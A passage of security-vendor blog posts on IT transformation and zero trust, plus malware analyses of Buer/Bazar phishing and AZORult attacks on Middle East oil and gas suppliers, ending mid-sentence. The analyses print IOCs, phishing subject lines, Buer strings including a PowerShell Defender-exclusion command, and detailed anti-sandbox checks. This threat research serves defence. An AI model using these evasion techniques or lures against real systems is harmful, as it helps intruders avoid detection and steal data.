recognize at the outset that the biggest challenge to transformation strategy isn’t technical. What if you build it and they don’t come? The new way of work dictates a new model of connectivity: The internet is the new network, and the cloud is the new data center. Change is rarely easy, and for IT organizations accustomed to (and certified in) the old way of doing things—e.g., perimeter hardware-based security encircling a hub-and-spoke network—the shift to the cloud can be difficult (and disorienting). IT teams beholden to legacy architectures build complex moats to protect the corporate assets within the metaphorical castle. But their legacy architectures can’t support your enterprise’s need for agility, performance, scalability, and most importantly, growth. It doesn’t matter how good the drawbridge may be if no one (except maybe threat actors) wants to enter the castle. Your crucial company assets, applications, and services have already moved to the cloud. Users perform the bulk of their work on the open internet, outside the corporate network perimeter and the purview of IT oversight. Meanwhile, IT teams worry about losing control of network access or security, and inviting a breach. They seek to reconcile differences between cloud provider and enterprise security posture. The problem here isn’t the technology. It’s that IT culture is averse to change. IT teams (particularly those with skill sets and certifications linked to legacy hardware) can be reluctant to embrace digital transformation: Will cloud deployment impact their job security? Will current skill sets lose value? Will team priorities change? And these concerns are understandable. As a transformation leader, you have a dual responsibility to lead digital transformation and ensure no one gets left behind. How to win friends and influence IT teams IT leaders must ensure everyone is excited about (and committed to) advancing company transformation and security. That requires giving them a reason to embrace change. Yes, it can mean IT roles evolve—but this evolution means IT gets to advance core business competencies and goals instead of hindering them with legacy architecture. This makes your IT department an enterprise value accelerator, instead of a brake pedal. Ensuring digital transformation success requires more than evangelism to IT stakeholders. It requires engagement. Here are four places to begin with your team: Solve a business challenge with transformation technology. Let your team get a transformation win, because nothing breeds success like...success: Find an ongoing business issue that technical innovation can solve. Create an IT team task force to address that issue. Ensure the mandate is clear: Solve this problem without regard to what the company currently uses in the network architecture. Use what best makes sense from a simplicity and agility point of view. Assess any new technologies or solutions that can solve that business problem. Don’t pigeonhole team creativity by tying success to a budget or TCO. When they find a solution that addresses the business problem, assure that it is acknowledged and promote their solution at the executive level. Demonstrate how IT can become the department of “yes.” Make the “to do” list work for you (and knock a few items off it for a change): Clearly outline a list of projects sitting on the back burner due to a lack of resources or legacy technology incompatibility. Assess and communicate the business value of the projects to your IT team. Challenge them to be a catalyst for change so that they focus on future objectives instead of “keeping the lights on.” Make continuing education easy. IT team members often worry, “What will I do if I’m not needed to build on-premises solutions?” Education is a constant catalyst and should be part of each staff member’s growth plan: If there is no growth, there’s no advancement. Outline the expectations for every team member, including how they fit into the transformation planning and provide access to the training they need to accomplish those goals. Offer multiple options: onsite lectures, online training, in-class lessons, and cross-departmental training (including a buddy/mentor environment). Build individual brands. Remind IT team members that the world is moving forward and that to remain valuable in their careers, they’ll need to roll with it. The experience they get shepherding transformation will build their resume and their brand, making them more valuable in the enterprise. Transformation: a technological and human issue For cloud-enabled enterprises, the present and future is perimeter-less cloud security. IT can’t cling to legacy architectures but must instead enable business goals. This means creating an agile, resilient network that can adapt to change. Digital transformation needs executive leadership. To do that successfully, you must get IT colleagues excited about embracing a new vision and being an enabler of the new future of the business. Assure that they have an active place in network transformation if they are willing to think differently about their role and how they contribute to achieving the business’ goals. Regardless of what they do, everyone should understand the organization’s goals and their role in its future and success. Pamela Kubiatowski is Sr. Director of Transformation Strategy at Zscaler Pamela Kubiatowski An Introduction to Zero Trust Network Access Zero trust is more important now than ever before. With a newly mobile workforce, an increased urgency for cloud, and an increase in phishing and ransomware attacks, zero trust has become the next critical step in digital transformation for many. In fact, according to a recent survey conducted by Microsoft, 51 percent of business leaders are accelerating their zero trust deployment, while 91 percent of companies report that they are in the process of deploying zero trust. While the term “zero trust” has become well known, many are unfamiliar with the technology that powers the zero trust model that businesses strive to achieve. This is where zero trust network access (ZTNA) comes in. What is ZTNA? Zero trust network access (ZTNA), also known as a software defined perimeter (SDP), is the technology that enables the secure connections behind a true zero trust model. Gartner defines ZTNA as a technology that “provides controlled access to resources, reducing the surface area for attack. The isolation afforded by ZTNA improves connectivity, removing the need to directly expose applications to the internet. The internet becomes an untrusted transport and access to applications occurs through an intermediary. The intermediary can be a cloud service controlled by a third-party provider or a self-hosted service.” – Gartner, Market Guide to Zero Trust Network Access, June 2020 But what does this mean for the business? Most importantly, it means that businesses no longer have to choose between upholding security standards and delivering a fast access experience for their users. The most popular ZTNA solutions are global cloud-delivered services that bring access as close to the user as possible, regardless of their location or device. As a result, many are switching from legacy VPN infrastructure to cloud-delivered ZTNA services. How is ZTNA unique? While many vendors claim to achieve zero trust, ZTNA is differentiated from other technologies in four critical areas. 1. Users are NEVER placed on the network Unlike technologies such as VPN, ZTNA completely isolates the act of providing application access from network access. This isolation reduces risk by keeping potentially infected devices from entering the corporate network and only grants application access to authorized users. 2. Internal apps are completely invisible ZTNA keeps both applications and infrastructure invisible to the internet by only initiating outbound connections. Unlike VPN that makes its location known to users, ZTNA never exposes IPs to the internet, making the network dark to unwanted users and internet-based attacks. 3. Lateral movement is eliminated ZTNA makes connections between an authorized user and a specific application on a one-to-one basis. That means IT can granularly and tactically eliminate lateral movement on the network or between applications by simply enforcing business policies. App segmentation is a native ability of ZTNA which eliminates the need to perform network segmentation. 4. The internet is used as a secure means of connectivity ZTNA takes a user-to-application approach rather than a network-centric approach to security. The network becomes deemphasized and the internet becomes the new corporate network, leveraging end-to-end encrypted TLS micro-tunnels, dramatically reducing the need for costly MPLS links. The ultimate benefit of ZTNA While there are many benefits to ZTNA, they all revolve around two important concepts: security and simplification. ZTNA makes IT’s life easier by eliminating headaches caused by traditional remote access technologies. With ZTNA, IT can have confidence knowing that their organization is secured with the highest level of zero trust access while users effortlessly connect to internal apps, allowing business to run as normal regardless of user location. IT doesn’t need to choose between providing security or offering a good user experience. You can achieve both, but it takes the right technology. Learn more about how ZTNA has led to the success of these business executives. Read these 3 top CxO stories. More resources: Free Attack Surface Analysis What is Zero Trust? What is Zero Trust Network Access? Gartner Market Guide for Zero Trust Network Access Camilla Alhquist is a product marketing specialist at Zscaler. Camilla Ahlquist Spear Phishing Campaign Delivers Buer and Bazar Malware Zscaler ThreatLabZ became aware of a prevalent phishing campaign targeting employees of various organizations. During the past couple of weeks, many enterprise users have been getting spear phishing emails indicating that their employment with the company has been terminated. These emails contain a Google document link that leads to the Bazar backdoor (from the TrickBot gang). What's interesting is that this campaign also used the Buer loader, which is the first time we have seen these two malware strains used together. Use of the Buer loader by the TrickBot gang comes as no surprise as this group is known to work with different malware groups. In the past, the TrickBot gang has also worked with other botnets, such as Emotet. Campaign In this email campaign, instead of relying on attachments, the attackers included links to what appeared to be a legitimate Google Docs document, which itself contained links to malicious files hosted on Google Drive or, in some cases, hosted elsewhere. In some previous phishing email campaigns, attackers leveraged SendGrid to distribute the initial emails to hide the Google Drive links in the documents behind a SendGrid URL as a way to bypass traditional defences. Samples of emails that we have seen are shown in Figure 1 and Figure 2. Figure 1: One of the spear phishing email templates targeting an employee. Figure 2: Another spear phishing email template The link in both emails is a Google Docs link claiming to host a PDF file with a list of employees that have been terminated, as shown in Figure 3. Figure 3: The link to the fake Google Doc containing the download link. The link in the Google Doc redirects to the URL unitedyfl[.]com/print_preview.exe to download the malware payload. Although, the use of target names with actuating themes is not new to this group, there has been a significant uptick in the number of emails received and this campaign has been persistently active for the past few weeks. Packer In most cases, the payload that is downloaded is the Bazar malware but, in some cases, it is the Buer loader. The packer used in both malware payloads is identical. Most notably, the packed binaries are exe files with a randomly named export function. The export function is responsible for payload decryption and injection. First, a shellcode is decrypted, which further decrypts a headerless PE loader that has the final payload in its overlay. The headersless loader allocates memory, maps the payload into memory with proper permissions, and finally transfers control to it. In this campaign, no process self-injection is used to load the payload. Figure 4: The decrypted header less PE loader. Figure 5: The payload embedded at the end of the loader. Bazar loader and Bazar backdoor The Bazar backdoor is a new stealthy malware, part of the TrickBot group’s toolkit arsenal and leveraged for high-value targets. The Bazar loader is used to download and execute the Bazar backdoor on the target system. The goal of this backdoor is to execute binaries, scripts, modules, kill processes, and then remove itself from the compromised machine. The samples used in this campaign heavily rely on control flow obfuscation. The detailed analysis report about this backdoor can be found here. The Bazar loader downloads the Bazar backdoor from the C&C using the following URI format: {C&C}/api/v\d{3} The downloaded payload is XOR-encrypted and can be decrypted using the script provided in the appendix. The downloaded malware was successfully captured by the Zscaler Cloud Sandbox:Figure 6: The Zscaler Cloud Sandbox report. The C&C TLS communications of the Bazar backdoor have been using certificates created in the same manner that TrickBot certificates have been created. The C&C server TLS certificate is shown in Figure 7. Figure 7: The Bazar/TrickBot TLS certificate. Researchers also observed that the backdoor downloads and executes the Cobalt Strike penetration testing and post-exploitation toolkit on the victim's machine within some period of time after the infection. By deploying Cobalt Strike, it is clear that this stealthy backdoor is being used to gain a foothold in corporate networks so that ransomware can be deployed, data can be stolen, or network access could be sold to other threat actors. Buer loader The Buer loader was first discovered around the end of 2019. It is a very capable malware written in C and primarily sold on Russian underground forums for around US$400. Notably, this malware does not function in the CIS. It has most of the important strings encrypted and APIs are loaded by hash, just like most of the sophisticated malware these days. We are not going to go into technical details because detailed analysis of this has already published. The Buer loader was captured by the Zscaler Cloud Sandbox. Figure 8: The Zscaler Cloud Sandbox report for the Buer loader. In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels: Win32.Trojan.Buerloader Win32.Backdoor.Bazar Conclusion The TrickBot group has been running similarly themed campaigns for some time. The targeted nature of the campaign with subject lines having the organization’s name makes these campaign’s highly effective compared to generic spray-and-pray attacks. But even these specially crafted attacks are not immune from a pair of vigilant eyes and the right set of tools. We at Zscaler ThreatLabZ are always on the lookout for bad stuff—be it for our company or for our customers—to provide protection against it. Last but not the least, always be attentive while opening any email links or attachments. Even if there is a tiny bit of suspicion, verify the email or get it reviewed thoroughly by your security team before proceeding further. IOCs MD5 Fa0322fb70610d6e67585588184eda39 (Buer loader) 06f42898d5b2303c0b455d3152ced044 (Bazar loader) 04a20c9f33023439b612935b6901917f (Bazar loader) 951acc18e4f14471f49235327e0c1ccc (Bazar loader) 4bb9a709958a1790a6bc257a9b5cb48e (Bazar loader) 03e699324d06bd3d597994f5df893048 (Bazar backdoor group: t1) Distribution and document URLs http://unitedyfl[.]com/print_preview.exe[.]com/document/u/1/d/e/2PACX-1vTwnIt9tXcgRxaOME9G3yErRp50dGxW1EKoTeIAYZwkMEg4j8fOpU9kP7xMJ6pufKfzsoETJwX5ZMM5/pub[.]com/document/u/1/d/e/2PACX-1vSE2BfEV4tOmHOpMzeBhWbyajWwjxajBvm1YpJSRWyDL-qXbnSsu-OHhyuT2Y4mbZ72uPT9uToZWvo2/pub[.]com/document/u/1/d/e/2PACX-1vTCf1OgjnHoaohnZ0BMwCFRU62HyC85BfeiX7NGPiwvrqr8P-_-Y_5Mab9wAJjCIcldWv8wvKVXFuiK/pub[.]com/document/d/e/2PACX-1vQ4MCpbsYfwekk44caru7p05aOKswFPvyQNsyow1Qfg1exHrGZHaqOmWcnSeAxmDK2V1i3ml9DP8kYT/pub[.]com/document/d/e/2PACX-1vRl0GvrO4JO8Rs4v1BTtXmsMThv1M413Z14onQl-TkrsXZEOOr1zF8gKu3GDOwFBN0kaw5g7oC7lbIE/pub[.]com/document/d/e/2PACX-1vR0NwqguWEFX4ZilvsxKSaJQbUfXpfK5fvWxbxUBJfPzbmvGuxHS7bltp9cjpJ0RvrvdlAxeKpSjDKQ/pub C&C Buer loader 104.248.83[.]13 Bazar loader 164.68.107[.]165 91.235.129[.]64 37.220.6[.]126 195.123.241[.]194 82.146.37[.]128 85.143.221[.]85 164.132.76[.]76 54.37.237[.]253 Some of the URIs seen in this campaign include /api/v190 - Download Updated Bazar loader(64 - bit) /api/v192 - Download Bazar backdoor(64 - bit) /api/v202 - (Server did not respond with payload at the time of analysis) /api/v207 - (Server did not respond with payload at the time of analysis) PDB string c:\Users\Mr.Anderson\Documents\Visual Studio 2008\Projects\Anderson\x64\Release\Anderson.pdb Some of the subject lines observed Re: {Target Company Name} termination list Re: {Target Company Name} avoiding FW: Urgent: {Target Company Name}: A Customer Complaint Request – Prompt Action Required RE: FYI: {Target Company Name} Employees Termination List – Confirmation Required Re: complaint request Re: my call, {Target Company Name}. Re: {Target Company Name} - my visit Re: can't call you MITRE ATT&CK ID Technique T1566.002 Phishing: Spearphishing Link T1566.003 Phishing: Spearphishing via Service T1204.001 User Execution: Malicious Link T1204.002 User Execution: Malicious File T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1055.013 Process Injection: Process Doppelgänging T1055.012 Process Injection: Process Hollowing T1027.002 Obfuscated Files or Information: Software Packing T1140 Deobfuscate/Decode Files or Information T1036.005 Masquerading: Match Legitimate Name or Location T1087 Account Discovery T1010 Application Window Discovery T1083 File and Directory Discovery T1057 Process Discovery T1012 Query Registry T1018 Remote System Discovery T1082 System Information Discovery T1033 System Owner/User Discovery T1124 System Time Discovery T1119 Automated Collection T1005 Data from Local System T1053.002 Scheduled Task/Job: At (Windows) T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL T1071.001 Application Layer Protocol: Web Protocols T1568.002 Dynamic Resolution: Domain Generation Algorithms T1020 Automated Exfiltration T1041 Exfiltration Over C2 Channel T1568.002 Dynamic Resolution: Domain Generation Algorithms Appendix Script to decrypt downloaded Bazar backdoor key = "20200915" data = open("v190", 'rb').read() out = "" for i in range(len(data)): out += chr(ord(data[i]) ^ ord(key[i%len(key)])) of = open('dec1', 'wb') of.write(out) of.close() #Note: Key can vary between downloader samples Buer strings Uc3nakqfdpmcFjc powershell.exe -Command "& {Add-MpPreference -ExclusionPath update Kdc23icmQoc21f open .dll rundll32 regsvr32 powershell.exe "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & ' %02x POST Content-Type: application/x-www-form-urlencoded runas %s, "%s" Software\Microsoft\Windows\CurrentVersion\RunOnce {%s-%d-%d} ntdll.dll myyux?44659379=3=83684 myyux?44659379=3=83684 myyux?44659379=3=83684 myyux?44659379=3=83684 myyux?44659379=3=83684 UndefinedTypeError>>1I5480%C9#5=O=B8 hd0OkaN3/Iqc7_Kdh secinit.exe false true null api/update/ api/update/ X4OIvcO7uWS update statusCode AccessToken method x64 exelocal memload memloadex api/download/ api/downloadmodule/ download_and_exec download_and_exec regsrv32 rundll rundllex parameters autorun explorer.exe api/module/ modules loaddllmem Admin User Windows 10 Windows Server 2019/Server 2016 Windows 8.1 Windows Server 2012 R2 Windows 8 Windows Server 2012 Windows 7 Windows Server 2008 R2 Windows XP SQCP]ICW X4OIvcO7uWS Unknown x32 x64 LdrLoadDll RtlCreateUserThread LdrGetProcedureAddress RtlFreeUnicodeString RtlAnsiStringToUnicodeString RtlInitAnsiString Mozilla/5.0 (Apple-iPhone7C2/1202.466; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543 Safari/419.3 X4OIvcO7uWS dllhost.exe dllhost.exe Software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell open akb,cvc %ALLUSERSPROFILE% Ostersin \AutoReg.exe " ensgJJ ensgJJ explorer.exe secinit.exe shell32.dll Winhttp.dll advapi32.dll user32.dll netapi32.dll NtWriteVirtualMemory Lr?jjma_rcTgprs_jKckmpw JbpEcrNpmacbspc?bbpcqq LrOscpwTgprs_jKckmpw LrDpccTgprs_jKckmpw LrNpmrcarTgprs_jKckmpw LrPc_bTgprs_jKckmpw LrEcrAmlrcvrRfpc_b LrQcrAmlrcvrRfpc_b Buer loader API hashes and corresponding API names 0x69f7df2a -> advapi32_GetTokenInformation 0xe79d18d6 -> kernel32_OpenProcessToken 0x47979a8f -> advapi32_GetCurrentHwProfileW 0x19e1e0c2 -> kernel32_RegCreateKeyExW 0xd45f73b5 -> kernel32_RegCloseKey 0xcb5998e2 -> kernel32_RegSetValueExW 0xce636ff5 -> advapi32_GetSidSubAuthority 0xaf7f658e -> winhttp_WinHttpOpen 0x20b4c051 -> winhttp_WinHttpSetTimeouts 0x8ef04f02 -> winhttp_WinHttpCrackUrl 0x9f47a05e -> winhttp_WinHttpConnect 0x1dd1d38d -> winhttp_WinHttpOpenRequest 0x26d17a4e -> winhttp_WinHttpSendRequest 0xb20e6a35 -> winhttp_WinHttpGetIEProxyConfigForCurrentUser 0x1ef97964 -> winhttp_WinHttpGetProxyForUrl 0x8678c3f6 -> winhttp_WinHttpSetOption 0xea74138b -> winhttp_WinHttpWriteData 0x80cc5bd7 -> winhttp_WinHttpReadData 0x6c3f3920 -> winhttp_WinHttpReceiveResponse 0xde67ac3c -> winhttp_WinHttpQueryHeaders 0x710832cd -> winhttp_WinHttpQueryDataAvailable 0x9964b3dc -> winhttp_WinHttpCloseHandle 0x302ebe1c -> kernel32_VirtualAlloc 0x4247bc72 -> kernel32_VirtualQuery 0x1803b7e3 -> kernel32_VirtualProtect 0x1a4b89aa -> kernel32_GetCurrentProcess 0x8a8b4676 -> kernel32_LoadLibraryA 0x1acaee7a -> kernel32_GetProcAddress 0x61eebd02 -> kernel32_GetModuleHandleW 0x8a8b468c -> kernel32_LoadLibraryW 0xab489125 -> kernel32_GetNativeSystemInfo 0x34590d2e -> kernel32_GetLastError 0x5b3716c6 -> kernel32_GlobalFree 0xe183277b -> kernel32_VirtualFree 0x62f1df50 -> kernel32_VirtualFreeEx 0xdd78764 -> kernel32_VirtualAllocEx 0xf3cf5f6f -> kernel32_GetModuleFileNameW 0xae7a8bda -> kernel32_CloseHandle 0x29e91ba6 -> kernel32_HeapSize 0xe3802c0b -> kernel32_HeapAlloc 0x864bde7e -> kernel32_GetProcessHeap 0x12dfcc4e -> kernel32_ExitProcess 0x7722b4b -> kernel32_TerminateProcess 0xb4f0f46f -> kernel32_CreateProcessW 0xff5ec2ce -> kernel32_ExitThread 0x4b3e6161 -> kernel32_TerminateThread 0xed619452 -> kernel32_CreateMutexW 0x7bffe25e -> kernel32_OpenMutexW 0xf785ce6 -> kernel32_ReadFile 0xe6886cef -> kernel32_WriteFile 0x1a7f0bab -> kernel32_CreateFileW 0xbdfa937d -> kernel32_GetFileSize 0x617ea42b -> kernel32_DeleteFileW 0x6659de75 -> kernel32_WriteProcessMemory 0xc56e656d -> kernel32_GetCommandLineW 0x78c1ba50 -> kernel32_ExpandEnvironmentStringsW 0x2e0ccb63 -> kernel32_CreateDirectoryW 0x5c62ca81 -> kernel32_WaitForSingleObject 0x8edf8b90 -> kernel32_OpenProcess 0x8a62152f -> kernel32_CreateToolhelp32Snapshot 0xc9112e01 -> kernel32_Process32NextW 0x63f6889c -> kernel32_Process32FirstW 0x4b9358fc -> kernel32_DuplicateHandle 0x24e2968d -> kernel32_GetComputerNameW 0x110e739a -> kernel32_GetVolumeInformationW 0xf7643b99 -> kernel32_GetThreadContext 0x3cc73360 -> kernel32_ResumeThread 0x77643b9b -> kernel32_SetThreadContext 0x1c2c653b -> ntdll_memset 0x1c846140 -> ntdll_memcpy 0x932d8a1a -> ntdll_NtDelayExecution 0x9716d04e -> ntdll_NtReleaseMutant 0x6f7f7a64 -> ntdll_RtlGetVersion 0x996cc394 -> ntdll_ZwUnmapViewOfSection 0xabf93436 -> ntdll_strtoul 0x2bd04fd1 -> ntdll_iswctype 0x26a5553c -> ntdll_strstr 0x4117fd0e -> ntdll_NtQueryDefaultLocale 0xd24c9118 -> ntdll_RtlCreateUserThread 0xd52ff865 -> ntdll_NtQueryVirtualMemory 0x339c09fb -> ntdll_NtQueryInformationProcess 0x6a13016e -> ntdll_NtSetInformationThread 0x6debaaa9 -> ntdll_NtFilterToken 0xd584ba6c -> shell32_SHGetFolderPathW 0x375eadf4 -> shell32_CommandLineToArgvW 0xba1eb35b -> shell32_ShellExecuteW 0xf674afe0 -> user32_wsprintfW References Mohd Sadique Join Us Live: Three Secrets to Stopping Ransomware Cold Zscaler will be hosting a webinar covering ransomware's ins and outs and what you can do to keep your organization safe. Learn more and secure your spot here. Ransomware continues to dominate headlines worldwide, with recent estimates surpassing $20 billion of damages in 2020 alone. Today’s adversaries are using a diverse set of methodologies to attack each target and easily bypass legacy security solutions. While ransomware can cause serious damage and disruption to a business’s networks, finances, and reputation, we assure you that it’s not all doom and gloom—if you know the secrets to stopping these attacks. We’ll be discussing all of that at our upcoming virtual event, The Three Secrets to Stopping Ransomware Cold, and I hope you’ll join us. I’ll be joined by Deepen Desai, CISO and VP of Security Research at Zscaler, and Tony Fergusson, our Director of Transformation Strategy. The three of us have spent years analyzing and combating ransomware, and we’ll dive into new techniques attackers are using to avoid detection, trick users, and coerce organizations into paying (it’s not just about losing data anymore). We’ll also explore the best ways to protect your enterprise from these highly disruptive attacks. The session will cover: How the latest ransomware campaigns exploit security weaknesses How ransomware hides inside encrypted traffic to bypass inspection What it takes to sandbox suspicious files effectively Why cloud scalability can close security gaps How a zero trust approach to connectivity eliminates your attack surface Ransomware isn’t going away—it is however getting more disruptive, more impactful, and more expensive. Legacy tools do not have the inspection capabilities to keep up with the demands of inspecting all traffic, quarantining threats at scale without performance dips, or delivering the always-on security necessary to defend today’s remote workforce. Zscaler, on the other hand, has already helped thousands of customers prevent ransomware and other cyberattacks using the Zscaler Zero Trust Exchange, the world’s largest inline security platform built for the cloud. Live webinar dates and times: America: Tuesday, September 29, 2020 | 11:00 AM PT | 2:00 PM ET EMEA: Wednesday, September 30, 2020 | 10:00 AM BEST | 11:00 AM CEST APAC: Wednesday, September 30, 2020 | 10:00 AM IST | 2:30 PM AEST Register today for one of these sessions. We look forward to seeing you there! About Bryan Lee Bryan is a Principal Product Manager at Zscaler, with more than ten years of experience in cybersecurity. His areas of expertise are espionage threats, cybersecurity operations, and threat intelligence. About Deepen Desai Deepen is the Zscaler CISO and VP of Security Research at Zscaler ThreatLabZ. Deepen has been actively involved in threat research and analysis for 13 years and is affiliated with various security working groups. About Tony Ferguson Tony is the Director Transformation Strategy at Zscaler and has more than 25 years of experience in IT networking and security across a range of organizations and industries, including manufacturing, information technology, and financial services. Bryan Lee Targeted Attacks on Oil and Gas Supply Chain Industries in the Middle East Cybercriminals are known to look to current events to make their schemes and campaigns more engaging and relevant to unsuspecting victims. These events don't need to be global in nature, and are often only of local or regional interest. This helps the bad actors narrow their target hoping for a greater chance of success. So when the Abu Dhabi National Oil Company (ADNOC) terminates engineering, procurement and construction (EPC) contracts it had previously awarded, attentive cybercriminals have new fodder for another scheme. Since July 2020, the Zscaler ThreatLabZ team has observed an increase in targeted attacks against multiple supply chain-related organizations in the oil and gas sector in the Middle East. We discovered multiple instances of malicious PDF files sent as email attachments and were used to distribute an information-stealing Trojan, AZORult, to these organizations. In this blog, we describe the details of this campaign, explaining the attack vectors, the malware distribution strategy, and the threat attribution. Distribution strategy The attack chain begins with an email that appears to be from an official working at the ADNOC and is targeted at officials working in the supply chain and government sectors in the Middle East. Each email in this campaign has an attached PDF file. This PDF contains download links on the first page that lead to legitimate file sharing sites, such as wetransfer and where a ZIP archive is hosted. The ZIP archive contains a malicious and packed .NET executable that will decrypt, load, and execute the embedded AZORult binary. Figure 1 shows a graphical representation of the attack flow. Figure 1: The flow of attack Email analysis Figure 2 shows an email message that pretends to come from a senior chemist of lab operations of ADNOC Sour Gas. Figure 2: A fake email sent to officials in the supply chain industry in the Middle East. In all the cases, the emails were sent from Gmail-based address. The two Gmail addresses observed in the attacks were: The threat actor also leveraged anonymous email services from Tutanota to create emails registered with and which were also used in this email campaign. The PDF files attached to the email are multipage documents (containing 14 pages) that appear to be Requests for Quotations (RFQ) for supply contracts and legal tenders for various projects related to ADNOC and the Doha airport. The decoy documents are carefully crafted to appear legitimate for social engineering purposes. The first page of each document contains the instructions to access the specifications and drawings using embedded download links that lead to malicious ZIP archives as described in the attack flow above. Some examples of the content in the PDFs include: PDF Filename: PI-18031 Dalma Gas Development Project (Package B) -TENDER BULLETIN-01.pdf MD5 hash: e368837a6cc3f6ec5dfae9a71203f2e2 Figure 3 shows a PDF that pretends to be a legitimate Request for Quotation (RFQ) related to the Dalma gas development project. It bears the logo of ADNOC at the top right and the first page contains the malicious download links. Figure 3: The fake letter contained in the PDF associated with this attack. PDF Filename: AJC-QA HAMAD INTERNATIONAL AIRPORT EXPANSION, DOHA.pdf MD5 hash: abab000b3162ed6001ed8a11024dd21c Figure 4 shows a PDF that pretends to be a Request for Quotation for Hamad International Airport expansion plan for Doha and supposedly comes from a supply chain trading contractor in Qatar. Figure 4: The fake RFQ for a local airport expansion project. Threat attribution The threat actor is specifically interested in Middle East targets, such as organisations in the supply chain and government sectors of the Middle East, especially the United Arab Emirates (UAE) and Qatar. Based on the target recipients of the email, the contents of the email, and the attached PDF files, along with the metadata and infrastructure analysis, we conclude that this is a targeted attack on organisations in the Middle East. Metadata analysis After investigating the metadata of PDF files, we were able to discover several PDFs that we associate with the same threat actor. The distribution method has been used in the wild from January 2020 through May 2020 in low volume. Starting from July 2020, we observed an increase in the activity of this threat actor, returning with a new campaign. The metadata of the PDF files indicates that they were generated using Microsoft Office Word 2013. The only unique author names used in all the PDF samples were: Donor1 Mr. Adeel Figure 5 shows an example of the metadata for the PDF file with the MD5 hash e368837a6cc3f6ec5dfae9a71203f2e2. Figure 5: The metadata of one of the PDFs used in this campaign. The complete list of all the PDF samples identified in this campaign is provided in the Appendix. Infrastructure analysis In addition to the contents of the emails and the documents that were used for threat attribution, we can also infer from the Command and Control (C&C) infrastructure that the threat actor has specifically chosen a C&C server that blends with the theme. The C&C server in the samples we discovered was At the time of analysis, this domain was resolving to the IP address We observed that this domain, when accessed directly, would redirect to a service consulting company from Egypt hosted at as shown in Figure 6. Figure 6: A legitimate Middle East-based site hosted at All of the following four domains would redirect to the above domain: With a high confidence level, we can conclude that this threat actor is interested in stealing information and gaining access to infrastructure of supply chain-related organisations located in the Middle East. Technical analysis of the .NET payload For the purpose of technical analysis, we will consider the .NET binary with MD5 hash: 84e7b5a60cd771173b75a775e0399bc7 This payload, which is present inside the downloaded ZIP archive, is a packed and obfuscated .NET binary. Based on static analysis, we can see that the payload pretends to be a Skype application with spoofed metadata as shown in Figure 7. Figure 7: Metadata of the main .NET executable. Upon execution, it unpacks another payload that is embedded in the resource section. Figure 8 shows the custom algorithm that decrypts the payload using a hardcoded key “GXR20”. Figure 8: The subroutine used to decrypt the second stage .NET DLL. Second stage Figure 9 shows the decrypted payload, which is a .NET DLL with the MD5 hash 0988195ab961071b4aa2d7a8c8e6372d and the name Aphrodite.dll Figure 9: The unpacked and loaded second stage DLL called Aphrodite. The code execution is transferred to the DLL by creating an object for class named “Mortiz.Anton” along with the following three parameters, as shown in Figure 10. ugz1: “ddLPjs” (name of the bitmap image resource) ugz3: ”KKBxPQsGk” (the decryption key) projName: “Skype” (name of the project of main executable) Figure 10: The code control passed to the Aphrodite DLL. This DLL further unpacks another binary, which is embedded as a bitmap image in the resource section of the main executable, as shown in Figure 11. Figure 11: The bitmap image inside the resource section that contains the next stage payload. Similar to the second stage (Aphrodite), it is also encrypted with a custom algorithm. The custom algorithm is based on XOR using the key indicated by the parameter ugz3. Third stage The resulting unpacked binary is a .NET DLL with MD5 hash ae5f14478d5e06c1b2dc2685cbe992c1 and the name Jupiter. The code control is transferred to the third stage DLL via a call to one of its routines as shown in Figure 12. Figure 12: The unpacked and loaded third stage DLL called Jupiter. This third stage DLL uses various methods to detect the presence of a virtualization or an analysis environment. Evasion techniques Below is a summary of the methods used by this DLL to detect the analysis environment. Registry checks: Registry key: "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0" Value: "Identifier" Data contains: "VBOX" OR "VMWARE" OR "QEMU" Registry key: "HARDWARE\\Description\\System" Value: "SystemBiosVersion" Data contains: "VBOX" OR "QEMU" Registry key: "HARDWARE\\Description\\System" Value: "VideoBiosVersion" Data contains: "VIRTUALBOX" Checks if key present: "SOFTWARE\\Oracle\\VirtualBox Guest Additions" OR "SOFTWARE\\VMware, Inc.\\VMware Tools" Registry key: "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0" Value: "Identifier" Data contains: "VMWARE" Registry key: "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 2\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0" Value: "Identifier" Data contains: "VMWARE" Registry key: "SYSTEM\\ControlSet001\\Services\\Disk\\Enum" Value: "0" Data contains: "VMWARE" Registry key: "SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000" Value: "DriverDesc" Data contains: "VMWARE" Registry key: "SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\Settings" Value: "Device Description" Data contains: "VMWARE" Registry key: "SOFTWARE\\VMware, Inc.\\VMware Tools" Value: "InstallPath" Data contains: "C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\" Wine environment detection: Checks if the export functions of kernel32.dll contains: wine_get_unix_file_name Windows Management Instrumentation (WMI) query-based checks: WMI Query: "SELECT * FROM Win32_VideoController" Property: "Description" Checks for the presence of the following keywords in the description field: "VM Additions S3 Trio32/64" "S3 Trio32/64" "VirtualBox Graphics Adapter" "VMware SVGA II" "VMWARE" DLL name-based checks: Checks for the presence of a DLL with the name: "SbieDll.dll" in the process address space. Username-based checks: Checks if the system username contains either of the following strings: "USER" "SANDBOX" "VIRUS" "MALWARE" "SCHMIDTI" "CURRENTUSER" Filename or filepath-based checks: FilePath contains: "//VIRUS" OR "SANDBOX" OR "SAMPLE" OR "C:\\file.exe" Window class check: "Afx:400000:0" After all the above environment checks are performed, the AZORult payload (MD5 hash: 38360115294c49538ab15b5ec3037a77) is injected using the process hollowing technique in a new instance of the main process. We will not describe the details of the functionality of AZORult information stealer since it is already well-documented in the public domain. It is important to note that based on the flow of the code execution and the anti-analysis techniques used, the .NET packed payload appears to be created using the CyaX packer. More details about this packer 